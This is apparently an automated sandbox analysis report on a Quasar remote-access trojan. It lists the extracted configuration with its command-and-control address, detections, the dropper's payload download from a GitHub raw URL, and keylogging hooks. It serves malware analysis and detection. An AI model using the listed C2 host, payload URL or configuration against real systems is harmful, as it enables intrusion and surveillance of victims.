Malware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "87.228.57.81:4782;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "cf3988ab-2fd9-4544-a16f-9faa71eb5bac", "StartupKey": "svchoost.exe", "Tag": "githubyt", "LogDirectoryName": "Logs", "ServerSignature": "SSSXaR44GRb6RYmfFpZjNvvxDEF0KI5jH8nAxi6KcQzCkmdFj4EmiNa7wzIn6QlTh6m9p8r0dvOdGcKp9R7a0feJ+9nftufivecVEcRMW+w9A0X3vAKDbhMDGoJK/oCpkIWanwn5htUKhAJB1lNPjwjIbjG59Xr7nQuXbI0zG8R5zUBqkB7LcDn23y9ViJS55kXsDdCMrrrzn3PsDzs0HTUE4E9W1OuqLpiq9ipYZce25NDQPlIfeAVgyRYzjvec4Uu1mthPaSYUvBiWdDBx5a+gN5tH6ZXROlVMsEMnIJhg/hN/HZVnynGXWaXLgqXtOtfSU5CWH4htKhRkXVbV4yhbXcIXhxL3G2FtXHDDWQjdiYyXKkTx8/z5tnTaobjzjutR8DMWLMg0D/zOKCP0VwSU5Vqn1N5RGbaOinPoUyKL1/3G9eTNYXnl00LzeENlA+hxJ6TyB9hsv85lArDm3jZ5ixI+Bl9M4ajNwTXVY8p+s41nOYrSammq6OgAThh4nd2GWivTLvpgYzJ7NWJM2yWObOFCJlLqdFVlOme65jzZyWtRSYx57sdgOVsNs5/OOJz6jSBSzEq3N0TN/hzpwQ6Tvxj0Xvvwn9DNmHiWLLE13tGYBkJfg+WVKW3m6MINZOm8VZ019XPs+RldMn2Kbu5SMX3WNIN7zvPGpR2mcRw=", "ServerCertificate": "MIIE9jCCAt6gAwIBAgIQAMCIrkV3lAMp6Vz+9SYptTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFQaGFudG9tIFNlcnZlciBDQTAgFw0yNTAxMjQxNzU0MjFaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRUGhhbnRvbSBTZXJ2ZXIgQ0EwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCLqDcacB918PiS52/zK8NuYRFBjeeZXbEfkolana8gflQhGUIyaXW73olgd952Z18rz4CBCX2jb1f+vqHqWwbwIiVt+Ek8urXFgrOXR2CMqV/HE3QRvviIPkrLKGUsAOue2cN0CRvgEnhMpw80CsO2ZJLCoD3NHsLp+1kY7HQalZeCDuyF9F/1zoRogBQ+yYyNDshY/FTdxRak/6a2WjSD0FJpHkMNKTvCYxi2AIILH57Cyz5dr6pD/s4T+2TiiBK2SlOqm2IQ7zkcfI5rRyie1Q4UwUK1Q7+AXni7Al7XYNH5n5sHGylOW55Sf1uX8rhD7dt/rVxv4IroQeXh0ULwnZkTzHxpjLUclv7FjqSSBegcF98uGdqJzZQDHzwUPEMqJvQ4ikZBKRZtDhReWYAZoobYHxrhAv471L6Ik7hWs8VE+DFifQu2WuV11N37JQR29uwCNMyRBGEmM02YHy36zxs8cjolbQO1HaNfAKfevaezg8czVT7XAgI72i27By9HfruniOU2xjpa1ZlHKGEi7GrYSplhZcflqbYrYdEy15VQ382yt3zkJo7DYkvGIhL2D4tt176o2yF7bm/EaLn8ID5qexn2oubC5o8HCe+KtnkfS4ARLmdpJg4U6pcZUbEbd7enqJ6LAUTJ7Gi3+NFXtPRm0lT5PRYemLHIcNaNjQIDAQABozIwMDAdBgNVHQ4EFgQUkztLutpnSBqQonmJDkIlJzumy2AwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAPw0vebSaYmKRfSaRE1e2YgOVyx+WZgXuPUUY7YjGpwYNRkjgtPNgsMtZDS3jXhhXBsyKsKGDcnS51Gz5c9wV4YxjoZRzXnIom0Ia1WXfifdugNvIRkKgNS3kn0SfHUjgjktUtZxAfUqiGJn2QipIDB5b+tEBG5J9PYWmNC+3205Z5cl9Ti9KgXN3FKf+/slRaE3ACPJlTdRIg3S5u7uFIKtEUkSE1WuhQi6Lyms2a0rILI3e53o+YmpSys1YOafIDUP8UboM9ktsJY4V3zcFheChn15IE+a8LJYcRAIsJbjPCw2Jo/z6R3+XY/U7nFyS5tU9oIjtDpndOOErtnVgiMeGNPmkEY3SvkEYjS8TXovcSJa00nj+yHapZxrzn9MYFYyP1lIlmhnnU+RnY5jhQVlnhccExAAb7BKXnuVI2EraVaz9wxHEUnD/3kzJj7gSvd1Ja/cqzjUb56fU4volehkDVt+XD+udV3KndKDCCwx0JEo4d/u+PHA9Q14Lw13dNWGL4zS7vqOzHYPGkeONKbq3RusCL6rzq7VcCQtg7CrB/cfuBx3cWGbM58uuLIQwoYmHrWqZo9UA7FNsodRUz+bwVokS90KzHSORD1bTc7VfotLt0P95UTm58zfgHd7CCqbjCNdaVU6JisRdkRwKr/r79j9z306SIvr1Qs6bRZw="}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	ReversingLabs: Detection: 95%
Source: C:\WCTVN\mmytljldrgl.exe	ReversingLabs: Detection: 95%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	ReversingLabs: Detection: 21%
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Virustotal: Detection: 26%			Perma Link

Yara detected Quasar RAT

Source: Yara match	File source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.2946566856.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.2059375290.0000000000770000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmytljldrgl.exe PID: 3156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Client.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
Source: Yara match	File source: C:\WCTVN\mmytljldrgl.exe, type: DROPPED

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Joe Sandbox ML: detected
Source: C:\WCTVN\mmytljldrgl.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: 1.4.1
Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: 87.228.57.81:4782;
Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: SubDir
Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Client.exe
Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cf3988ab-2fd9-4544-a16f-9faa71eb5bac
Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: svchoost.exe
Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: githubyt
Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Logs
Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: SSSXaR44GRb6RYmfFpZjNvvxDEF0KI5jH8nAxi6KcQzCkmdFj4EmiNa7wzIn6QlTh6m9p8r0dvOdGcKp9R7a0feJ+9nftufivecVEcRMW+w9A0X3vAKDbhMDGoJK/oCpkIWanwn5htUKhAJB1lNPjwjIbjG59Xr7nQuXbI0zG8R5zUBqkB7LcDn23y9ViJS55kXsDdCMrrrzn3PsDzs0HTUE4E9W1OuqLpiq9ipYZce25NDQPlIfeAVgyRYzjvec4Uu1mthPaSYUvBiWdDBx5a+gN5tH6ZXROlVMsEMnIJhg/hN/HZVnynGXWaXLgqXtOtfSU5CWH4htKhRkXVbV4yhbXcIXhxL3G2FtXHDDWQjdiYyXKkTx8/z5tnTaobjzjutR8DMWLMg0D/zOKCP0VwSU5Vqn1N5RGbaOinPoUyKL1/3G9eTNYXnl00LzeENlA+hxJ6TyB9hsv85lArDm3jZ5ixI+Bl9M4ajNwTXVY8p+s41nOYrSammq6OgAThh4nd2GWivTLvpgYzJ7NWJM2yWObOFCJlLqdFVlOme65jzZyWtRSYx57sdgOVsNs5/OOJz6jSBSzEq3N0TN/hzpwQ6Tvxj0Xvvwn9DNmHiWLLE13tGYBkJfg+WVKW3m6MINZOm8VZ019XPs+RldMn2Kbu5SMX3WNIN7zvPGpR2mcRw=
Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: MIIE9jCCAt6gAwIBAgIQAMCIrkV3lAMp6Vz+9SYptTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFQaGFudG9tIFNlcnZlciBDQTAgFw0yNTAxMjQxNzU0MjFaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRUGhhbnRvbSBTZXJ2ZXIgQ0EwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCLqDcacB918PiS52/zK8NuYRFBjeeZXbEfkolana8gflQhGUIyaXW73olgd952Z18rz4CBCX2jb1f+vqHqWwbwIiVt+Ek8urXFgrOXR2CMqV/HE3QRvviIPkrLKGUsAOue2cN0CRvgEnhMpw80CsO2ZJLCoD3NHsLp+1kY7HQalZeCDuyF9F/1zoRogBQ+yYyNDshY/FTdxRak/6a2WjSD0FJpHkMNKTvCYxi2AIILH57Cyz5dr6pD/s4T+2TiiBK2SlOqm2IQ7zkcfI5rRyie1Q4UwUK1Q7+AXni7Al7XYNH5n5sHGylOW55Sf1uX8rhD7dt/rVxv4IroQeXh0ULwnZkTzHxpjLUclv7FjqSSBegcF98uGdqJzZQDHzwUPEMqJvQ4ikZBKRZtDhReWYAZoobYHxrhAv471L6Ik7hWs8VE+DFifQu2WuV11N37JQR29uwCNMyRBGEmM02YHy36zxs8cjolbQO1HaNfAKfevaezg8czVT7XAgI72i27By9HfruniOU2xjpa1ZlHKGEi7GrYSplhZcflqbYrYdEy15VQ382yt3zkJo7DYkvGIhL2D4tt176o2yF7bm/EaLn8ID5qexn2oubC5o8HCe+KtnkfS4ARLmdpJg4U6pcZUbEbd7enqJ6LAUTJ7Gi3+NFXtPRm0lT5PRYemLHIcNaNjQIDAQABozIwMDAdBgNVHQ4EFgQUkztLutpnSBqQonmJDkIlJzumy2AwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAPw0vebSaYmKRfSaRE1e2YgOVyx+WZgXuPUUY7YjGpwYNRkjgtPNgsMtZDS3jXhhXBsyKsKGDcnS51Gz5c9wV4YxjoZRzXnIom0Ia1WXfifdugNvIRkKgNS3kn0SfHUjgjktUtZxAfUqiGJn2QipIDB5b+tEBG5J9PYWmNC+3205Z5cl9Ti9KgXN3FKf+/slRaE3ACPJlTdRIg3S5u7uFIKtEUkSE1WuhQi6Lyms2a0rILI3e53o+YmpSys1YOafIDUP8UboM9ktsJY4V3zcFheChn15IE+a8LJYcRAIsJbjPCw2Jo/z6R3+XY/U7nFyS5tU9oIjtDpndOOErtnVgiMeGNPmkEY3SvkEYjS8TXovcSJa00nj+yHapZxrzn9MYFYyP1lIlmhnnU+RnY5jhQVlnhccExAAb7BKXnuVI2EraVaz9wxHEUnD/3kzJj7gSvd1Ja/cqzjUb56fU4volehkDVt+XD+udV3KndKDCCwx0JEo4d/u+PHA9Q14Lw13dNWGL4zS7vqOzHYPGkeONKbq3RusCL6rzq7VcCQtg7CrB/cfuBx3cWGbM58uuLIQwoYmHrWqZo9UA7FNsodRUz+bwVokS90KzHSORD1bTc7VfotLt0P95UTm58zfgHd7CCqbjCNdaVU6JisRdkRwKr/r79j9z306SIvr1Qs6bRZw=

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49740 version: TLS 1.2

Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Administrator\Desktop\libranceroom\x64\Release\libranceroom.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe
Source:	Binary string: C:\Users\Administrator\Desktop\libranceroom\x64\Release\libranceroom.pdb/ source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Code function: 0_2_00007FF7E76A3798 FindFirstFileExW,

0_2_00007FF7E76A3798

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 87.228.57.81:4782 -> 192.168.2.4:49739

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 87.228.57.81

Source: global traffic

TCP traffic: 192.168.2.4:49739 -> 87.228.57.81:4782

Source: Joe Sandbox View	IP Address: 140.82.121.4 140.82.121.4
Source: Joe Sandbox View	IP Address: 185.199.110.133 185.199.110.133
Source: Joe Sandbox View	IP Address: 185.199.110.133 185.199.110.133

Source: Joe Sandbox View

ASN Name: INF-NET-ASRU INF-NET-ASRU

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS query: name: ipwho.is

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 87.228.57.81
Source: unknown	TCP traffic detected without corresponding DNS query: 87.228.57.81
Source: unknown	TCP traffic detected without corresponding DNS query: 87.228.57.81
Source: unknown	TCP traffic detected without corresponding DNS query: 87.228.57.81
Source: unknown	TCP traffic detected without corresponding DNS query: 87.228.57.81
Source: unknown	TCP traffic detected without corresponding DNS query: 87.228.57.81
Source: unknown	TCP traffic detected without corresponding DNS query: 87.228.57.81
Source: unknown	TCP traffic detected without corresponding DNS query: 87.228.57.81
Source: unknown	TCP traffic detected without corresponding DNS query: 87.228.57.81
Source: unknown	TCP traffic detected without corresponding DNS query: 87.228.57.81
Source: unknown	TCP traffic detected without corresponding DNS query: 87.228.57.81
Source: unknown	TCP traffic detected without corresponding DNS query: 87.228.57.81
Source: unknown	TCP traffic detected without corresponding DNS query: 87.228.57.81
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Code function: 0_2_00007FF7E7682DC0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00007FF7E7682DC0

Source: global traffic	HTTP traffic detected: GET /temperloin/piponis/raw/refs/heads/main/mmytljldrgl.exe HTTP/1.1User-Agent: MyAppHost: github.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /temperloin/piponis/refs/heads/main/mmytljldrgl.exe HTTP/1.1User-Agent: MyAppCache-Control: no-cacheHost: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: ipwho.is

Source: Client.exe, 0000001B.00000002.2970279187.000000001BE8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Client.exe, 0000001B.00000002.2941270172.00000000014F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en089
Source: Client.exe, 0000001B.00000002.2946566856.00000000034AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ipwho.is
Source: powershell.exe, 00000011.00000002.1866240120.000001D721514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1965574062.0000015710074000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000015.00000002.1905001429.000001570022A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Client.exe, 0000001B.00000002.2946566856.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: powershell.exe, 00000011.00000002.1848192756.000001D7116C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1905001429.000001570022A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000011.00000002.1848192756.000001D7114A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1905001429.0000015700001000.00000004.00000800.00020000.00000000.sdmp, mmytljldrgl.exe, 00000018.00000002.2089381424.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000001B.00000002.2946566856.0000000003109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.1848192756.000001D7116C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1905001429.000001570022A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000015.00000002.1905001429.000001570022A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000011.00000002.1872774385.000001D729740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000011.00000002.1848192756.000001D7114A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1905001429.0000015700001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: mmytljldrgl.exe, 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, mmytljldrgl.exe, 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, Client.exe.24.dr, mmytljldrgl.exe.0.dr, mmytljldrgl[1].exe.0.dr	String found in binary or memory: https://api.ipify.org/
Source: powershell.exe, 00000015.00000002.1965574062.0000015710074000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.1965574062.0000015710074000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.1965574062.0000015710074000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/
Source: powershell.exe, 00000015.00000002.1905001429.000001570022A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/X
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	String found in binary or memory: https://github.com/temperloin/piponis/raw/refs/heads/main/mmytljldrgl.exe
Source: ConDrv.0.dr	String found in binary or memory: https://github.com/temperloin/piponis/raw/refs/heads/main/mmytljldrgl.exe...
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/temperloin/piponis/raw/refs/heads/main/mmytljldrgl.exe2
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A900000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/temperloin/piponis/raw/refs/heads/main/mmytljldrgl.exe=
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A962000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/temperloin/piponis/raw/refs/heads/main/mmytljldrgl.exeg
Source: Client.exe, 0000001B.00000002.2946566856.0000000003491000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipwho.is
Source: mmytljldrgl.exe, 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, mmytljldrgl.exe, 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, Client.exe, 0000001B.00000002.2946566856.0000000003491000.00000004.00000800.00020000.00000000.sdmp, Client.exe.24.dr, mmytljldrgl.exe.0.dr, mmytljldrgl[1].exe.0.dr	String found in binary or memory: https://ipwho.is/
Source: powershell.exe, 00000011.00000002.1866240120.000001D721514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1965574062.0000015710074000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A9D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/
Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A992000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/temperloin/piponis/refs/heads/main/mmytljldrgl.exe
Source: mmytljldrgl.exe, 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, mmytljldrgl.exe, 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, Client.exe.24.dr, mmytljldrgl.exe.0.dr, mmytljldrgl[1].exe.0.dr	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: mmytljldrgl.exe, 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, mmytljldrgl.exe, 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, Client.exe, 0000001B.00000002.2946566856.0000000003111000.00000004.00000800.00020000.00000000.sdmp, Client.exe.24.dr, mmytljldrgl.exe.0.dr, mmytljldrgl[1].exe.0.dr	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: mmytljldrgl.exe, 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, mmytljldrgl.exe, 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, Client.exe.24.dr, mmytljldrgl.exe.0.dr, mmytljldrgl[1].exe.0.dr	String found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49740 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\SubDir\Client.exe

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Code function: 0_2_00007FF7E7681FF0 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

0_2_00007FF7E7681FF0

E-Banking Fraud

Yara detected Quasar RAT

Source: Yara match	File source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.2946566856.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.2059375290.0000000000770000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmytljldrgl.exe PID: 3156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Client.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
Source: Yara match	File source: C:\WCTVN\mmytljldrgl.exe, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPED	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPED	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPED	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: C:\WCTVN\mmytljldrgl.exe, type: DROPPED	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: C:\WCTVN\mmytljldrgl.exe, type: DROPPED	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: C:\WCTVN\mmytljldrgl.exe, type: DROPPED	Matched rule: Detects Quasar infostealer Author: ditekshen

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E769DF88	0_2_00007FF7E769DF88
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E7682790	0_2_00007FF7E7682790
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E7685790	0_2_00007FF7E7685790
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E7683520	0_2_00007FF7E7683520
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe	Code function: 0_2_00007FF7E76AACC8	0_2_00007FF7E76AACC8
